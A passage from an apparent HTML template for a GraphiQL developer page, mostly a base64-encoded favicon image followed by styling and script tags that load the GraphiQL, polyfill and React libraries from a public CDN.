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" rel="icon" type="image/x-icon" /> <style> body { margin: 0; overflow: hidden; } #graphiql { height: 100vh; } </style> <link href="//cdn.jsdelivr.net/npm/graphiql@{{graphiql_version}}/graphiql.css" rel="stylesheet" /> <script src="//cdn.jsdelivr.net/npm/promise-polyfill@8.1.3/dist/polyfill.min.js"></script> <script src="//cdn.jsdelivr.net/npm/unfetch@4.1.0/dist/unfetch.umd.js"></script> <script src="//cdn.jsdelivr.net/npm/react@16.13.1/umd/react.production.min.js"></script> <script 